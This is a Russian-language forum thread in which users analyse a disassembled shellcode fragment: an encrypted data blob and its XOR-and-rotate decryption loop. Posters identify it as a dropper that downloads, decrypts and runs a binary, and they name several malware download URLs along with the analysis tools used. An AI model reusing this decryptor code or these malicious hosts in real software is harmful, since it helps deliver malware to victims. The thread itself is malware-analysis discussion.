207. DB 018h
208. DB 02Ah                                      ; CHAR '*'
209. DB 0F9h
210. DB 0B7h
211. DB 0D2h
212. DB 077h                                      ; CHAR 'w'
213. DB 0B3h
214. DB 01
215. DB 045h                                      ; CHAR 'E'
216. DB 08Ah
217. DB 092h
218. DB 0B7h
219. DB 0ADh
220. DB 050h                                      ; CHAR 'P'
221. DB 05Dh                                      ; CHAR ']'
222. DB 0E4h
223. DB 067h                                      ; CHAR 'g'
224. DB 0F5h
225. DB 0E6h
226. DB 0C7h
227. DB 01Ah
228. DB 0BFh
229. DB 0ABh
230. DB 01Eh
231. DB 010h
232. DB 042h                                      ; CHAR 'B'
233. DB 076h                                      ; CHAR 'v'
234. DB 0A2h
235. DB 0A1h
236. DB 054h                                      ; CHAR 'T'
237. DB 063h                                      ; CHAR 'c'
238. DB 09
239. DB 07Bh                                      ; CHAR '{'
240. DB 089h
241. DB 0B0h
242. DB 0F4h
243. DB 097h
244. DB 04Eh                                      ; CHAR 'N'
245. DB 073h                                      ; CHAR 's'
246. XCHG EAX,EBX
247. AAS
248. INT1
249.  
250. @test_004011FF:
251.  
252. CMP DWORD PTR SS:[EBP],2
253. JE @test_00401265                            ; test.00401265
254. MOV DWORD PTR SS:[EBP],1
255. MOV DWORD PTR SS:[EBP+010h],078652E79h
256. MOV DWORD PTR SS:[EBP+014h],0172h
257. MOV EDI,DWORD PTR SS:[EBP+018h]
258. ADD EDI,DWORD PTR SS:[EBP+014h]
259. MOV ECX,026h
260. MOV EDX,DWORD PTR DS:[EDI-4]
261. CALL @test_00401232                          ; test.00401232
262. JMP @test_004010AE                           ; test.004010AE
263.  
264. @test_00401232:                              ;<= Procedure Start
265.  
266. XOR EAX,EAX
267. MOV AL,BYTE PTR DS:[EDI]
268. ROR AL,CL
269. XOR AL,CL
270. NOT AL
271. XOR AL,CH
272. XOR AL,DL
273. XOR AL,DH
274. ROL AL,CL
275. ADD AL,CL
276. ADD AL,CH
277. ADD AL,DL
278. ADD AL,DH
279. ROR AL,CL
280. SUB AL,CL
281. SUB AL,CH
282. NOT AL
283. SUB AL,DL
284. SUB AL,DH
285. ROL AL,CL
286. ROL EDX,CL
287. BSWAP EDX
288. MOV BYTE PTR DS:[EDI],AL
289. INC EDI
290. DEC ECX
291. JNZ @test_00401232                           ; test.00401232
292. RETN                                         ;<= Procedure End
293.  
294.  
295. @test_00401265:
296.  
297. RETN

 

спасибо.
можете рассказать как это удалось получить и с помощью каких средст(хотя бы коротко)?

 

Обычный байткод

Masm32, Ollydbg с плагином Code Ripper Plugin 1.3

 

Flint_ta
Вы людей-то не путайте. Байт-код - это инструкции для виртуальной машины.

 

тогда шеллкод

 

Если не сложно, расскажите, что делает полученный код.

 

drunkboy
Это примитивный дроппер, качает криптованный бинарь отсюда h**p://theyaredead.net/last/cache.php, расшифровывает и запускает. Образчик также криптованный, что он делает не смотрел, если нужен в архиве(сигнатура битая, поправить).

 

кто-то говорит что качает отсюда:
http://vbotnete.ru:10283/upload/download.p...76f5ff5332c59ed
http://clicksurfcash.net/ftp/ftp.exe
Что такое "образчик"?

 

drunkboy
Дамп начиная с "DB 018h" это шифрованный путь, расшифрованный я привёл, что кто думает без разницы.

Это моя точка зрения на то, что скачивается и запускается. Можите рассматривать это как взгляд авера на модуль

 

В Загрузи OllyDbg. Открой в нем любое приложения. Дождись загрузак dll. Ну а топом в произвольном характере перебей память своим shell'ом. Ты увидиш вызовы функции если они имеются(хотя судя со всего идет вызов каких то классов)
И может быть то поймеш откуда тебе отталкиватся.

Ну или тестовое приложения с shellcode я думаю проблемы не возникнет....